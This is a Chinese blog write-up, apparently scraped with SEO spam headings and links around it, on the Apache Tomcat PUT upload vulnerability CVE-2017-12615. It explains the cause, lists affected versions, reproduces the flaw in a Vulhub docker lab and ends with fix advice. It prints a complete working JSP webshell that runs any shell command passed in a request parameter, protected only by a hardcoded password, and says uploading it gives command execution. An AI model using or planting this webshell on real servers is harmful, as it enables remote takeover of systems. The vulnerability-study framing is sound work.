当前位置: 首页 > news >正文

永州网站建设如何百度推广费用多少

永州网站建设如何,百度推广费用多少,网站外链建设大揭秘,企业网络推广服务漏洞简介 2017年9月19日,Apache Tomcat官方确认并修复了两个高危漏洞,漏洞CVE编号:CVE-2017-12615和CVE-2017-12616,其中 远程代码执行漏洞(CVE-2017-12615) 当 Tomcat 运行在 Windows 主机上,…

漏洞简介

2017年9月19日,Apache Tomcat官方确认并修复了两个高危漏洞,漏洞CVE编号:CVE-2017-12615和CVE-2017-12616,其中 远程代码执行漏洞(CVE-2017-12615) 当 Tomcat 运行在 Windows 主机上,且启用了 HTTP PUT 请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求向服务器上传包含任意代码的 JSP 文件。之后,JSP 文件中的代码将能被服务器执行。

漏洞原理

org.apache.jasper.servlet.JspServlet:默认处理jsp,jspx文件请求,不存在PUT上传逻辑,无法处理PUT请求
org.apache.catalina.servlets.DefaultServlet:默认处理静态文件(除jsp,jspx之外的文件),存在PUT上传处理逻辑,可以处理PUT请求。
所以即使可以PUT一个文件到服务器但也无法直接PUT以jsp,jspx结尾文件,因为这些这些后缀的文件都是交由JspServlet处理的,它没法处理PUT请求。
但是当利用Windows特性绕过文件名检测机制时,tomcat并不认为其是jsp文件从而交由DefaultServlet处理,从而成功创建jsp文件

影响版本

Apache Tomcat 7.0.0 - 7.0.79(7.0.81修复不完全)

漏洞复现

环境搭建

cd /vulhub/tomcat/CVE-2017-12615
docker-compose up -d

在这里插入图片描述

漏洞验证

原始数据包如下
在这里插入图片描述
将GET修改为PUT,并填写内容(这里解析没成功,改成了/1.jsp/)
在这里插入图片描述
进入容器,发现上传成功
在这里插入图片描述
若从浏览器访问返回Hello,则证明漏洞存在
在这里插入图片描述

漏洞利用

将exp写入jsp并上传

<%@ page language="java" contentType="text/html; charset=GBK"pageEncoding="UTF-8"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>一句话木马</title></head><body><%if ("admin".equals(request.getParameter("pwd"))) {java.io.InputStream input = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();int len = -1;byte[] bytes = new byte[4092];out.print("<pre>");while ((len = input.read(bytes)) != -1) {out.println(new String(bytes, "GBK"));}out.print("</pre>");}%></body>
</html>

在这里插入图片描述
访问即可命令执行
在这里插入图片描述

修复建议

升级版本
开启readonly

http://www.yayakq.cn/news/546118/

相关文章:

  • 如何做地方网站app安装下载官网
  • 北京市违法建设投诉网站行业网站网址
  • 盐城市建设银行网站中国最好的域名注册网站
  • 单纯做网站的公司竞价被恶意点击怎么办
  • 诸城做网站的网络营销工具的分类
  • 徐州开发的网站青岛做网站建设价格
  • wordpress网站主修改网站链接如何做二维码
  • 中国建设银行北京分行官网站什么网站能代做预算
  • 企业网站设计html深圳建设网站的公司哪家好
  • 重要的网站建设wordpress文章排行榜
  • 建设投资公司网站网站域名空间费用
  • 免费建立个人app网站集团网站 wordpress
  • 校园网站建设的意义电子商务网站预算模板
  • 住房和城乡建设局部网站怎么才能提高网站点击量 免费
  • 抚州市建设局网站公司起名大全2021最新版的免费
  • 企业网站建设注意点如何做网站标题
  • 网站首页命名网页传奇游戏排行榜比亚迪
  • 做网站虚拟主机哪里有邯郸seo
  • 南通网站建设排名公司哪家好网站变宽屏怎么做
  • 网站建设 数据库管理做一个网页版面多少钱
  • 做网站的公司哪家强移动互联网包含( )三个方面
  • 单页面网站 seo建设网站的HTML代码
  • 山东省建设安全生产协会网站西安网站开发托管代运营
  • 那间公司做网站好sem优化
  • 刚注册在域名可以自己做网站吗网页编辑软件有哪些?
  • 人与狗做的网站wordpress 数字排序
  • 自动更新的网站建设装修公司网站建设解决方案
  • 网站建设学院python语言教程
  • 网站如何做伪静态页面可以把网站建设在云主机上吗
  • 旅行社网站系统点击排名优化